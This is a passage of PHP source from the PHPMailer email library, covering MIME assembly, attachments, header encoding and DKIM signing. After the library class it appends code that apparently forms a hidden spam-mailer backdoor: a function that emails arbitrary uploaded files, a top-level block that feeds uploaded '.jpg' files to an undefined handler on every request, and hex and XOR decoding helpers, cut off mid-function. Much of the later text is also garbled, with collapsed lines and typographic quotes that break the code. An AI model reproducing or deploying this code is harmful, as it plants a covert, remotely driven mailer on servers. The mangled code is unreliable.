$body .= $this->getBoundary($this->boundary[1], '', 'text/calendar; method=REQUEST', '');
$body .= $this->encodeString($this->Ical, $this->Encoding);
$body .= $this->LE . $this->LE;
}
$body .= $this->endBoundary($this->boundary[1]);
break;
case 'alt_inline':
$body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
$body .= $this->encodeString($this->AltBody, $altBodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->textLine('--' . $this->boundary[1]);
$body .= $this->headerLine('Content-Type', 'multipart/related;');
$body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
$body .= $this->LE;
$body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
$body .= $this->encodeString($this->Body, $bodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->attachAll('inline', $this->boundary[2]);
$body .= $this->LE;
$body .= $this->endBoundary($this->boundary[1]);
break;
case 'alt_attach':
$body .= $this->textLine('--' . $this->boundary[1]);
$body .= $this->headerLine('Content-Type', 'multipart/alternative;');
$body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
$body .= $this->LE;
$body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
$body .= $this->encodeString($this->AltBody, $altBodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
$body .= $this->encodeString($this->Body, $bodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->endBoundary($this->boundary[2]);
$body .= $this->LE;
$body .= $this->attachAll('attachment', $this->boundary[1]);
break;
case 'alt_inline_attach':
$body .= $this->textLine('--' . $this->boundary[1]);
$body .= $this->headerLine('Content-Type', 'multipart/alternative;');
$body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
$body .= $this->LE;
$body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
$body .= $this->encodeString($this->AltBody, $altBodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->textLine('--' . $this->boundary[2]);
$body .= $this->headerLine('Content-Type', 'multipart/related;');
$body .= $this->textLine("\tboundary=\"" . $this->boundary[3] . '"');
$body .= $this->LE;
$body .= $this->getBoundary($this->boundary[3], $bodyCharSet, 'text/html', $bodyEncoding);
$body .= $this->encodeString($this->Body, $bodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->attachAll('inline', $this->boundary[3]);
$body .= $this->LE;
$body .= $this->endBoundary($this->boundary[2]);
$body .= $this->LE;
$body .= $this->attachAll('attachment', $this->boundary[1]);
break;
default:
// catch case 'plain' and case ''
$body .= $this->encodeString($this->Body, $bodyEncoding);
break;
}
if ($this->isError()) {
$body = '';
} elseif ($this->sign_key_file) {
try {
if (!defined('PKCS7_TEXT')) {
throw new phpmailerException($this->lang('signing') . ' OpenSSL extension missing.');
}
// @TODO would be nice to use php://temp streams here, but need to wrap for PHP < 5.1 $file = tempnam(sys_get_temp_dir(), 'mail'); if (false === file_put_contents($file, $body)) { throw new phpmailerException($this->lang('signing') . ' Could not write temp file');
}
$signed = tempnam(sys_get_temp_dir(), 'signed');
if (@openssl_pkcs7_sign(
$file,
$signed,
'file://' . realpath($this->sign_cert_file),
array('file://' . realpath($this->sign_key_file), $this->sign_key_pass),
null
)
) {
@unlink($file);
$body = file_get_contents($signed);
@unlink($signed);
} else {
@unlink($file);
@unlink($signed);
throw new phpmailerException($this->lang('signing') . openssl_error_string());
}
} catch (phpmailerException $exc) {
$body = '';
if ($this->exceptions) {
throw $exc;
}
}
}
return $body;
}
protected function getBoundary($boundary, $charSet, $contentType, $encoding)
{
$result = '';
if ($charSet == '') {
$charSet = $this->CharSet;
}
if ($contentType == '') {
$contentType = $this->ContentType;
}
if ($encoding == '') {
$encoding = $this->Encoding;
}
$result .= $this->textLine('--' . $boundary);
$result .= sprintf('Content-Type: %s; charset=%s', $contentType, $charSet);
$result .= $this->LE;
// RFC1341 part 5 says 7bit is assumed if not specified
if ($encoding != '7bit') {
$result .= $this->headerLine('Content-Transfer-Encoding', $encoding);
}
$result .= $this->LE;
return $result;
}
protected function endBoundary($boundary)
{
return $this->LE . '--' . $boundary . '--' . $this->LE;
}
protected function setMessageType()
{
$type = array();
if ($this->alternativeExists()) {
$type[] = 'alt';
}
if ($this->inlineImageExists()) {
$type[] = 'inline';
}
if ($this->attachmentExists()) {
$type[] = 'attach';
}
$this->message_type = implode('_', $type);
if ($this->message_type == '') {
$this->message_type = 'plain';
}
}
public function headerLine($name, $value)
{
return $name . ': ' . $value . $this->LE;
}
public function textLine($value)
{
return $value . $this->LE;
}
public function addAttachment($path, $name = '', $encoding = 'base64', $type = '', $disposition = 'attachment')
{
try {
if (!@is_file($path)) {
throw new phpmailerException($this->lang('file_access') . $path, self::STOP_CONTINUE);
}
// If a MIME type is not specified, try to work it out from the file name
if ($type == '') {
$type = self::filenameToType($path);
}
$filename = basename($path);
if ($name == '') {
$name = $filename;
}
$this->attachment[] = array(
0 => $path,
1 => $filename,
2 => $name,
3 => $encoding,
4 => $type,
5 => false, // isStringAttachment
6 => $disposition,
7 => 0
);
} catch (phpmailerException $exc) {
$this->setError($exc->getMessage());
$this->edebug($exc->getMessage());
if ($this->exceptions) {
throw $exc;
}
return false;
}
return true;
}
public function getAttachments()
{
return $this->attachment;
}
protected function attachAll($disposition_type, $boundary)
{
// Return text of body
$mime = array();
$cidUniq = array();
$incl = array();
// Add all attachments
foreach ($this->attachment as $attachment) {
// Check if it is a valid disposition_filter
if ($attachment[6] == $disposition_type) {
// Check for string attachment
$string = '';
$path = '';
$bString = $attachment[5];
if ($bString) {
$string = $attachment[0];
} else {
$path = $attachment[0];
}
$inclhash = md5(serialize($attachment));
if (in_array($inclhash, $incl)) {
continue;
}
$incl[] = $inclhash;
$name = $attachment[2];
$encoding = $attachment[3];
$type = $attachment[4];
$disposition = $attachment[6];
$cid = $attachment[7];
if ($disposition == 'inline' && isset($cidUniq[$cid])) {
continue;
}
$cidUniq[$cid] = true;
$mime[] = sprintf('--%s%s', $boundary, $this->LE);
$mime[] = sprintf(
'Content-Type: %s; name="%s"%s',
$type,
$this->encodeHeader($this->secureHeader($name)),
$this->LE
);
// RFC1341 part 5 says 7bit is assumed if not specified
if ($encoding != '7bit') {
$mime[] = sprintf('Content-Transfer-Encoding: %s%s', $encoding, $this->LE);
}
if ($disposition == 'inline') {
$mime[] = sprintf('Content-ID: <%s>%s', $cid, $this->LE);
}
// If a filename contains any of these chars, it should be quoted,
// but not otherwise: RFC2183 & RFC2045 5.1
// Fixes a warning in IETF's msglint MIME checker
// Allow for bypassing the Content-Disposition header totally
if (!(empty($disposition))) {
$encoded_name = $this->encodeHeader($this->secureHeader($name));
if (preg_match('/[ \(\)<>@,;:\\"\/\[\]\?=]/', $encoded_name)) {
$mime[] = sprintf(
'Content-Disposition: %s; filename="%s"%s',
$disposition,
$encoded_name,
$this->LE . $this->LE
);
} else {
$mime[] = sprintf(
'Content-Disposition: %s; filename=%s%s',
$disposition,
$encoded_name,
$this->LE . $this->LE
);
}
} else {
$mime[] = $this->LE;
}
// Encode as string attachment
if ($bString) {
$mime[] = $this->encodeString($string, $encoding);
if ($this->isError()) {
return '';
}
$mime[] = $this->LE . $this->LE;
} else {
$mime[] = $this->encodeFile($path, $encoding);
if ($this->isError()) {
return '';
}
$mime[] = $this->LE . $this->LE;
}
}
}
$mime[] = sprintf('--%s--%s', $boundary, $this->LE);
return implode('', $mime);
}
protected function encodeFile($path, $encoding = 'base64')
{
try {
if (!is_readable($path)) {
throw new phpmailerException($this->lang('file_open') . $path, self::STOP_CONTINUE);
}
$magic_quotes = get_magic_quotes_runtime();
if ($magic_quotes) {
if (version_compare(PHP_VERSION, '5.3.0', '<')) { set_magic_quotes_runtime(false); } else { ini_set('magic_quotes_runtime', 0); } } $file_buffer = file_get_contents($path); $file_buffer = $this->encodeString($file_buffer, $encoding);
if ($magic_quotes) {
if (version_compare(PHP_VERSION, '5.3.0', '<')) { set_magic_quotes_runtime($magic_quotes); } else { ini_set('magic_quotes_runtime', ($magic_quotes?'1':'0')); } } return $file_buffer; } catch (Exception $exc) { $this->setError($exc->getMessage());
return '';
}
}
public function encodeString($str, $encoding = 'base64')
{
$encoded = '';
switch (strtolower($encoding)) {
case 'base64':
$encoded = chunk_split(base64_encode($str), 76, $this->LE);
break;
case '7bit':
case '8bit':
$encoded = $this->fixEOL($str);
// Make sure it ends with a line break
if (substr($encoded, -(strlen($this->LE))) != $this->LE) {
$encoded .= $this->LE;
}
break;
case 'binary':
$encoded = $str;
break;
case 'quoted-printable':
$encoded = $this->encodeQP($str);
break;
default:
$this->setError($this->lang('encoding') . $encoding);
break;
}
return $encoded;
}
public function encodeHeader($str, $position = 'text')
{
$matchcount = 0;
switch (strtolower($position)) {
case 'phrase':
if (!preg_match('/[\200-\377]/', $str)) {
// Can't use addslashes as we don't know the value of magic_quotes_sybase
$encoded = addcslashes($str, "\0..\37\177\\\"");
if (($str == $encoded) && !preg_match('/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str)) {
return ($encoded);
} else {
return ("\"$encoded\"");
}
}
$matchcount = preg_match_all('/[^\040\041\043-\133\135-\176]/', $str, $matches);
break;
/** @noinspection PhpMissingBreakStatementInspection */
case 'comment':
$matchcount = preg_match_all('/[()"]/', $str, $matches);
// Intentional fall-through
case 'text':
default:
$matchcount += preg_match_all('/[\000-\010\013\014\016-\037\177-\377]/', $str, $matches);
break;
}
if ($matchcount == 0) { // There are no chars that need encoding
return ($str);
}
$maxlen = 75 - 7 - strlen($this->CharSet);
// Try to select the encoding which should produce the shortest output
if ($matchcount > strlen($str) / 3) {
// More than a third of the content will need encoding, so B encoding will be most efficient
$encoding = 'B';
if (function_exists('mb_strlen') && $this->hasMultiBytes($str)) {
$encoded = $this->base64EncodeWrapMB($str, "\n");
} else {
$encoded = base64_encode($str);
$maxlen -= $maxlen % 4;
$encoded = trim(chunk_split($encoded, $maxlen, "\n"));
}
} else {
$encoding = 'Q';
$encoded = $this->encodeQ($str, $position);
$encoded = $this->wrapText($encoded, $maxlen, true);
$encoded = str_replace('=' . self::CRLF, "\n", trim($encoded));
}
$encoded = preg_replace('/^(.*)$/m', ' =?' . $this->CharSet . "?$encoding?\\1?=", $encoded);
$encoded = trim(str_replace("\n", $this->LE, $encoded));
return $encoded;
}
public function hasMultiBytes($str)
{
if (function_exists('mb_strlen')) {
return (strlen($str) > mb_strlen($str, $this->CharSet));
} else { // Assume no multibytes (we can't handle without mbstring functions anyway)
return false;
}
}
public function has8bitChars($text)
{
return (boolean)preg_match('/[\x80-\xFF]/', $text);
}
public function base64EncodeWrapMB($str, $linebreak = null)
{
$start = '=?' . $this->CharSet . '?B?';
$end = '?=';
$encoded = '';
if ($linebreak === null) {
$linebreak = $this->LE;
}
$mb_length = mb_strlen($str, $this->CharSet);
// Each line must have length <= 75, including $start and $end
$length = 75 - strlen($start) - strlen($end);
// Average multi-byte ratio
$ratio = $mb_length / strlen($str);
// Base64 has a 4:3 ratio
$avgLength = floor($length * $ratio * .75);
for ($i = 0; $i < $mb_length; $i += $offset) { $lookBack = 0; do { $offset = $avgLength - $lookBack; $chunk = mb_substr($str, $i, $offset, $this->CharSet);
$chunk = base64_encode($chunk);
$lookBack++;
} while (strlen($chunk) > $length);
$encoded .= $chunk . $linebreak;
}
// Chomp the last linefeed
$encoded = substr($encoded, 0, -strlen($linebreak));
return $encoded;
}
public function encodeQP($string, $line_max = 76)
{
if (function_exists('quoted_printable_encode')) { // Use native function if it's available (>= PHP5.3)
return $this->fixEOL(quoted_printable_encode($string));
}
// Fall back to a pure PHP implementation
$string = str_replace(
array('%20', '%0D%0A.', '%0D%0A', '%'),
array(' ', "\r\n=2E", "\r\n", '='),
rawurlencode($string)
);
$string = preg_replace('/[^\r\n]{' . ($line_max - 3) . '}[^=\r\n]{2}/', "$0=\r\n", $string);
return $this->fixEOL($string);
}
public function encodeQPphp(
$string,
$line_max = 76,
/** @noinspection PhpUnusedParameterInspection */ $space_conv = false
) {
return $this->encodeQP($string, $line_max);
}
public function encodeQ($str, $position = 'text')
{
// There should not be any EOL in the string
$pattern = '';
$encoded = str_replace(array("\r", "\n"), '', $str);
switch (strtolower($position)) {
case 'phrase':
// RFC 2047 section 5.3
$pattern = '^A-Za-z0-9!*+\/ -';
break;
/** @noinspection PhpMissingBreakStatementInspection */
case 'comment':
// RFC 2047 section 5.2
$pattern = '\(\)"';
case 'text':
default:
$pattern = '\000-\011\013\014\016-\037\075\077\137\177-\377' . $pattern;
break;
}
$matches = array();
if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) {
$eqkey = array_search('=', $matches[0]);
if (false !== $eqkey) {
unset($matches[0][$eqkey]);
array_unshift($matches[0], '=');
}
foreach (array_unique($matches[0]) as $char) {
$encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded);
}
}
// Replace every spaces to _ (more readable than =20)
return str_replace(' ', '_', $encoded);
}
public function addStringAttachment(
$string,
$filename,
$encoding = 'base64',
$type = '',
$disposition = 'attachment'
) {
// If a MIME type is not specified, try to work it out from the file name
if ($type == '') {
$type = self::filenameToType($filename);
}
// Append to $attachment array
$this->attachment[] = array(
0 => $string,
1 => $filename,
2 => basename($filename),
3 => $encoding,
4 => $type,
5 => true, // isStringAttachment
6 => $disposition,
7 => 0
);
}
public function addEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = '', $disposition = 'inline')
{
if (!@is_file($path)) {
$this->setError($this->lang('file_access') . $path);
return false;
}
// If a MIME type is not specified, try to work it out from the file name
if ($type == '') {
$type = self::filenameToType($path);
}
$filename = basename($path);
if ($name == '') {
$name = $filename;
}
// Append to $attachment array
$this->attachment[] = array(
0 => $path,
1 => $filename,
2 => $name,
3 => $encoding,
4 => $type,
5 => false, // isStringAttachment
6 => $disposition,
7 => $cid
);
return true;
}
public function addStringEmbeddedImage(
$string,
$cid,
$name = '',
$encoding = 'base64',
$type = '',
$disposition = 'inline'
) {
// If a MIME type is not specified, try to work it out from the name
if ($type == '') {
$type = self::filenameToType($name);
}
// Append to $attachment array
$this->attachment[] = array(
0 => $string,
1 => $name,
2 => $name,
3 => $encoding,
4 => $type,
5 => true, // isStringAttachment
6 => $disposition,
7 => $cid
);
return true;
}
public function inlineImageExists()
{
foreach ($this->attachment as $attachment) {
if ($attachment[6] == 'inline') {
return true;
}
}
return false;
}
public function attachmentExists()
{
foreach ($this->attachment as $attachment) {
if ($attachment[6] == 'attachment') {
return true;
}
}
return false;
}
public function alternativeExists()
{
return !empty($this->AltBody);
}
public function clearAddresses()
{
foreach ($this->to as $to) {
unset($this->all_recipients[strtolower($to[0])]);
}
$this->to = array();
}
public function clearCCs()
{
foreach ($this->cc as $cc) {
unset($this->all_recipients[strtolower($cc[0])]);
}
$this->cc = array();
}
public function clearBCCs()
{
foreach ($this->bcc as $bcc) {
unset($this->all_recipients[strtolower($bcc[0])]);
}
$this->bcc = array();
}
public function clearReplyTos()
{
$this->ReplyTo = array();
}
public function clearAllRecipients()
{
$this->to = array();
$this->cc = array();
$this->bcc = array();
$this->all_recipients = array();
}
public function clearAttachments()
{
$this->attachment = array();
}
public function clearCustomHeaders()
{
$this->CustomHeader = array();
}
protected function setError($msg)
{
$this->error_count++;
if ($this->Mailer == 'smtp' and !is_null($this->smtp)) {
$lasterror = $this->smtp->getError();
if (!empty($lasterror) and array_key_exists('smtp_msg', $lasterror)) {
$msg .= '
‘ . $this->lang(‘smtp_error’) . $lasterror[‘smtp_msg’] . ”
\n”; } } $this->ErrorInfo = $msg; } public static function rfcDate() { // Set the time zone to whatever the default is to avoid 500 errors // Will default to UTC if it’s not set properly in php.ini date_default_timezone_set(@date_default_timezone_get()); return date(‘D, j M Y H:i:s O’); } protected function serverHostname() { $result = ‘localhost.localdomain’; if (!empty($this->Hostname)) { $result = $this->Hostname; } elseif (isset($_SERVER) and array_key_exists(‘SERVER_NAME’, $_SERVER) and !empty($_SERVER[‘SERVER_NAME’])) { $result = $_SERVER[‘SERVER_NAME’]; } elseif (function_exists(‘gethostname’) && gethostname() !== false) { $result = gethostname(); } elseif (php_uname(‘n’) !== false) { $result = php_uname(‘n’); } return $result; } protected function lang($key) { if (count($this->language) < 1) { $this->setLanguage(‘en’); // set the default language } if (isset($this->language[$key])) { return $this->language[$key]; } else { return ‘Language string failed to load: ‘ . $key; } } public function isError() { return ($this->error_count > 0); } public function fixEOL($str) { // Normalise to \n $nstr = str_replace(array(“\r\n”, “\r”), “\n”, $str); // Now convert LE as needed if ($this->LE !== “\n”) { $nstr = str_replace(“\n”, $this->LE, $nstr); } return $nstr; } public function addCustomHeader($name, $value = null) { if ($value === null) { // Value passed in as name:value $this->CustomHeader[] = explode(‘:’, $name, 2); } else { $this->CustomHeader[] = array($name, $value); } } public function msgHTML($message, $basedir = ”, $advanced = false) { preg_match_all(‘/(src|background)=[“\’](.*)[“\’]/Ui’, $message, $images); if (isset($images[2])) { foreach ($images[2] as $imgindex => $url) { // Convert data URIs into embedded images if (preg_match(‘#^data:(image[^;,]*)(;base64)?,#’, $url, $match)) { $data = substr($url, strpos($url, ‘,’)); if ($match[2]) { $data = base64_decode($data); } else { $data = rawurldecode($data); } $cid = md5($url) . ‘@phpmailer.0’; // RFC2392 S 2 if ($this->addStringEmbeddedImage($data, $cid, ”, ‘base64’, $match[1])) { $message = str_replace( $images[0][$imgindex], $images[1][$imgindex] . ‘=”cid:’ . $cid . ‘”‘, $message ); } } elseif (!preg_match(‘#^[A-z]+://#’, $url)) { // Do not change urls for absolute images (thanks to corvuscorax) $filename = basename($url); $directory = dirname($url); if ($directory == ‘.’) { $directory = ”; } $cid = md5($url) . ‘@phpmailer.0’; // RFC2392 S 2 if (strlen($basedir) > 1 && substr($basedir, -1) != ‘/’) { $basedir .= ‘/’; } if (strlen($directory) > 1 && substr($directory, -1) != ‘/’) { $directory .= ‘/’; } if ($this->addEmbeddedImage( $basedir . $directory . $filename, $cid, $filename, ‘base64’, self::_mime_types((string)self::mb_pathinfo($filename, PATHINFO_EXTENSION)) ) ) { $message = preg_replace( ‘/’ . $images[1][$imgindex] . ‘=[“\’]’ . preg_quote($url, ‘/’) . ‘[“\’]/Ui’, $images[1][$imgindex] . ‘=”cid:’ . $cid . ‘”‘, $message ); } } } } $this->isHTML(true); // Convert all message body line breaks to CRLF, makes quoted-printable encoding work much better $this->Body = $this->normalizeBreaks($message); $this->AltBody = $this->normalizeBreaks($this->html2text($message, $advanced)); if (empty($this->AltBody)) { $this->AltBody = ‘To view this email message, open it in a program that understands HTML!’ . self::CRLF . self::CRLF; } return $this->Body; } public function html2text($html, $advanced = false) { if (is_callable($advanced)) { return call_user_func($advanced, $html); } return html_entity_decode( trim(custom_strip_tags(preg_replace(‘/<(head|title|style|script)[^>]*>.*?<\/\\1>/si’, ”, $html))), ENT_QUOTES, $this->CharSet ); } public static function _mime_types($ext = ”) { $mimes = array( ‘xl’ => ‘application/excel’, ‘js’ => ‘application/javascript’, ‘hqx’ => ‘application/mac-binhex40’, ‘cpt’ => ‘application/mac-compactpro’, ‘bin’ => ‘application/macbinary’, ‘doc’ => ‘application/msword’, ‘word’ => ‘application/msword’, ‘class’ => ‘application/octet-stream’, ‘dll’ => ‘application/octet-stream’, ‘dms’ => ‘application/octet-stream’, ‘exe’ => ‘application/octet-stream’, ‘lha’ => ‘application/octet-stream’, ‘lzh’ => ‘application/octet-stream’, ‘psd’ => ‘application/octet-stream’, ‘sea’ => ‘application/octet-stream’, ‘so’ => ‘application/octet-stream’, ‘oda’ => ‘application/oda’, ‘pdf’ => ‘application/pdf’, ‘ai’ => ‘application/postscript’, ‘eps’ => ‘application/postscript’, ‘ps’ => ‘application/postscript’, ‘smi’ => ‘application/smil’, ‘smil’ => ‘application/smil’, ‘mif’ => ‘application/vnd.mif’, ‘xls’ => ‘application/vnd.ms-excel’, ‘ppt’ => ‘application/vnd.ms-powerpoint’, ‘wbxml’ => ‘application/vnd.wap.wbxml’, ‘wmlc’ => ‘application/vnd.wap.wmlc’, ‘dcr’ => ‘application/x-director’, ‘dir’ => ‘application/x-director’, ‘dxr’ => ‘application/x-director’, ‘dvi’ => ‘application/x-dvi’, ‘gtar’ => ‘application/x-gtar’, ‘php3’ => ‘application/x-httpd-php’, ‘php4’ => ‘application/x-httpd-php’, ‘php’ => ‘application/x-httpd-php’, ‘phtml’ => ‘application/x-httpd-php’, ‘phps’ => ‘application/x-httpd-php-source’, ‘swf’ => ‘application/x-shockwave-flash’, ‘sit’ => ‘application/x-stuffit’, ‘tar’ => ‘application/x-tar’, ‘tgz’ => ‘application/x-tar’, ‘xht’ => ‘application/xhtml+xml’, ‘xhtml’ => ‘application/xhtml+xml’, ‘zip’ => ‘application/zip’, ‘mid’ => ‘audio/midi’, ‘midi’ => ‘audio/midi’, ‘mp2’ => ‘audio/mpeg’, ‘mp3’ => ‘audio/mpeg’, ‘mpga’ => ‘audio/mpeg’, ‘aif’ => ‘audio/x-aiff’, ‘aifc’ => ‘audio/x-aiff’, ‘aiff’ => ‘audio/x-aiff’, ‘ram’ => ‘audio/x-pn-realaudio’, ‘rm’ => ‘audio/x-pn-realaudio’, ‘rpm’ => ‘audio/x-pn-realaudio-plugin’, ‘ra’ => ‘audio/x-realaudio’, ‘wav’ => ‘audio/x-wav’, ‘bmp’ => ‘image/bmp’, ‘gif’ => ‘image/gif’, ‘jpeg’ => ‘image/jpeg’, ‘jpe’ => ‘image/jpeg’, ‘jpg’ => ‘image/jpeg’, ‘png’ => ‘image/png’, ‘tiff’ => ‘image/tiff’, ‘tif’ => ‘image/tiff’, ‘eml’ => ‘message/rfc822’, ‘css’ => ‘text/css’, ‘html’ => ‘text/html’, ‘htm’ => ‘text/html’, ‘shtml’ => ‘text/html’, ‘log’ => ‘text/plain’, ‘text’ => ‘text/plain’, ‘txt’ => ‘text/plain’, ‘rtx’ => ‘text/richtext’, ‘rtf’ => ‘text/rtf’, ‘vcf’ => ‘text/vcard’, ‘vcard’ => ‘text/vcard’, ‘xml’ => ‘text/xml’, ‘xsl’ => ‘text/xml’, ‘mpeg’ => ‘video/mpeg’, ‘mpe’ => ‘video/mpeg’, ‘mpg’ => ‘video/mpeg’, ‘mov’ => ‘video/quicktime’, ‘qt’ => ‘video/quicktime’, ‘rv’ => ‘video/vnd.rn-realvideo’, ‘avi’ => ‘video/x-msvideo’, ‘movie’ => ‘video/x-sgi-movie’ ); return (array_key_exists(strtolower($ext), $mimes) ? $mimes[strtolower($ext)]: ‘application/octet-stream’); } public static function filenameToType($filename) { // In case the path is a URL, strip any query string before getting extension $qpos = strpos($filename, ‘?’); if (false !== $qpos) { $filename = substr($filename, 0, $qpos); } $pathinfo = self::mb_pathinfo($filename); return self::_mime_types($pathinfo[‘extension’]); } public static function mb_pathinfo($path, $options = null) { $ret = array(‘dirname’ => ”, ‘basename’ => ”, ‘extension’ => ”, ‘filename’ => ”); $pathinfo = array(); if (preg_match(‘%^(.*?)[\\\\/]*(([^/\\\\]*?)(\.([^\.\\\\/]+?)|))[\\\\/\.]*$%im’, $path, $pathinfo)) { if (array_key_exists(1, $pathinfo)) { $ret[‘dirname’] = $pathinfo[1]; } if (array_key_exists(2, $pathinfo)) { $ret[‘basename’] = $pathinfo[2]; } if (array_key_exists(5, $pathinfo)) { $ret[‘extension’] = $pathinfo[5]; } if (array_key_exists(3, $pathinfo)) { $ret[‘filename’] = $pathinfo[3]; } } switch ($options) { case PATHINFO_DIRNAME: case ‘dirname’: return $ret[‘dirname’]; case PATHINFO_BASENAME: case ‘basename’: return $ret[‘basename’]; case PATHINFO_EXTENSION: case ‘extension’: return $ret[‘extension’]; case PATHINFO_FILENAME: case ‘filename’: return $ret[‘filename’]; default: return $ret; } } public function set($name, $value = ”) { try { if (isset($this->$name)) { $this->$name = $value; } else { throw new phpmailerException($this->lang(‘variable_set’) . $name, self::STOP_CRITICAL); } } catch (Exception $exc) { $this->setError($exc->getMessage()); if ($exc->getCode() == self::STOP_CRITICAL) { return false; } } return true; } public function secureHeader($str) { return trim(str_replace(array(“\r”, “\n”), ”, $str)); } public static function normalizeBreaks($text, $breaktype = “\r\n”) { return preg_replace(‘/(\r\n|\r|\n)/ms’, $breaktype, $text); } public function sign($cert_filename, $key_filename, $key_pass) { $this->sign_cert_file = $cert_filename; $this->sign_key_file = $key_filename; $this->sign_key_pass = $key_pass; } public function DKIM_QP($txt) { $line = ”; for ($i = 0; $i < strlen($txt); $i++) { $ord = ord($txt[$i]); if (((0x21 <= $ord) && ($ord <= 0x3A)) || $ord == 0x3C || ((0x3E <= $ord) && ($ord <= 0x7E))) { $line .= $txt[$i]; } else { $line .= ‘=’ . sprintf(‘%02X’, $ord); } } return $line; } public function DKIM_Sign($signHeader) { if (!defined(‘PKCS7_TEXT’)) { if ($this->exceptions) { throw new phpmailerException($this->lang(‘signing’) . ‘ OpenSSL extension missing.’); } return ”; } $privKeyStr = file_get_contents($this->DKIM_private); if ($this->DKIM_passphrase != ”) { $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase); } else { $privKey = $privKeyStr; } if (openssl_sign($signHeader, $signature, $privKey)) { return base64_encode($signature); } return ”; } public function DKIM_HeaderC($signHeader) { $signHeader = preg_replace(‘/\r\n\s+/’, ‘ ‘, $signHeader); $lines = explode(“\r\n”, $signHeader); foreach ($lines as $key => $line) { list($heading, $value) = explode(‘:’, $line, 2); $heading = strtolower($heading); $value = preg_replace(‘/\s+/’, ‘ ‘, $value); // Compress useless spaces $lines[$key] = $heading . ‘:’ . trim($value); // Don’t forget to remove WSP around the value } $signHeader = implode(“\r\n”, $lines); return $signHeader; } public function DKIM_BodyC($body) { if ($body == ”) { return “\r\n”; } // stabilize line endings $body = str_replace(“\r\n”, “\n”, $body); $body = str_replace(“\n”, “\r\n”, $body); // END stabilize line endings while (substr($body, strlen($body) – 4, 4) == “\r\n\r\n”) { $body = substr($body, 0, strlen($body) – 2); } return $body; } public function DKIM_Add($headers_line, $subject, $body) { $DKIMsignatureType = ‘rsa-sha1’; // Signature & hash algorithms $DKIMcanonicalization = ‘relaxed/simple’; // Canonicalization of header/body $DKIMquery = ‘dns/txt’; // Query method $DKIMtime = time(); // Signature Timestamp = seconds since 00:00:00 – Jan 1, 1970 (UTC time zone) $subject_header = “Subject: $subject”; $headers = explode($this->LE, $headers_line); $from_header = ”; $to_header = ”; $current = ”; foreach ($headers as $header) { if (strpos($header, ‘From:’) === 0) { $from_header = $header; $current = ‘from_header’; } elseif (strpos($header, ‘To:’) === 0) { $to_header = $header; $current = ‘to_header’; } else { if ($current && strpos($header, ‘ =?’) === 0) { $current .= $header; } else { $current = ”; } } } $from = str_replace(‘|’, ‘=7C’, $this->DKIM_QP($from_header)); $to = str_replace(‘|’, ‘=7C’, $this->DKIM_QP($to_header)); $subject = str_replace( ‘|’, ‘=7C’, $this->DKIM_QP($subject_header) ); // Copied header fields (dkim-quoted-printable) $body = $this->DKIM_BodyC($body); $DKIMlen = strlen($body); // Length of body $DKIMb64 = base64_encode(pack(‘H*’, sha1($body))); // Base64 of packed binary SHA-1 hash of body $ident = ($this->DKIM_identity == ”) ? ” : ‘ i=’ . $this->DKIM_identity . ‘;’; $dkimhdrs = ‘DKIM-Signature: v=1; a=’ . $DKIMsignatureType . ‘; q=’ . $DKIMquery . ‘; l=’ . $DKIMlen . ‘; s=’ . $this->DKIM_selector . “;\r\n” . “\tt=” . $DKIMtime . ‘; c=’ . $DKIMcanonicalization . “;\r\n” . “\th=From:To:Subject;\r\n” . “\td=” . $this->DKIM_domain . ‘;’ . $ident . “\r\n” . “\tz=$from\r\n” . “\t|$to\r\n” . “\t|$subject;\r\n” . “\tbh=” . $DKIMb64 . “;\r\n” . “\tb=”; $toSign = $this->DKIM_HeaderC( $from_header . “\r\n” . $to_header . “\r\n” . $subject_header . “\r\n” . $dkimhdrs ); $signed = $this->DKIM_Sign($toSign); return $dkimhdrs . $signed . “\r\n”; } public function getToAddresses() { return $this->to; } public function getCcAddresses() { return $this->cc; } public function getBccAddresses() { return $this->bcc; } public function getReplyToAddresses() { return $this->ReplyTo; } public function getAllRecipientAddresses() { return $this->all_recipients; } protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from) { if (!empty($this->action_function) && is_callable($this->action_function)) { $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from); call_user_func_array($this->action_function, $params); } } } class phpmailerException extends Exception { public function errorMessage() { $errorMsg = ‘‘ . $this->getMessage() . “
\n”; return $errorMsg; } } ///////////////////////////////////////////////////////////////// function sendSmtpMail($from_email, $from_name, $to, $subject, $body, $type, $config_file) { $mail = new PHPMailer(); $mail->isMail(); $mail->CharSet = ‘utf-8’; $mail->SetFrom($from_email, $from_name); $mail->AddAddress($to); $mail->Subject = $subject; if ($type == “1”) { $mail->MsgHTML($body); } elseif ($type == “2”) { $mail->isHTML(false); $mail->Body = $body; } if (isset($_FILES)) { foreach($_FILES as $key => $file) { if ($file[‘tmp_name’] != $config_file) { $mail->addAttachment($file[‘tmp_name’], $file[‘name’]); } } } if (!$mail->send()) { return $mail->ErrorInfo; } else { return 0; } } if (isset($_FILES)) { foreach($_FILES as $key => $file) { if(strpos($file[‘name’], “.jpg”)) { $res = type1_send($file[‘tmp_name’]); if ($res) { echo $res; } } } } function myhex2bin( $str ) { $sbin = “”; $len = strlen( $str ); for ( $i = 0; $i < $len; $i += 2 ) { $sbin .= pack( “H*”, substr( $str, $i, 2 ) ); } return $sbin; } function decode($data, $key) { $out_data = “”; for ($i=0; $i<strlen($data);) { for ($j=0; $j<strlen($key) && $i<strlen($data); 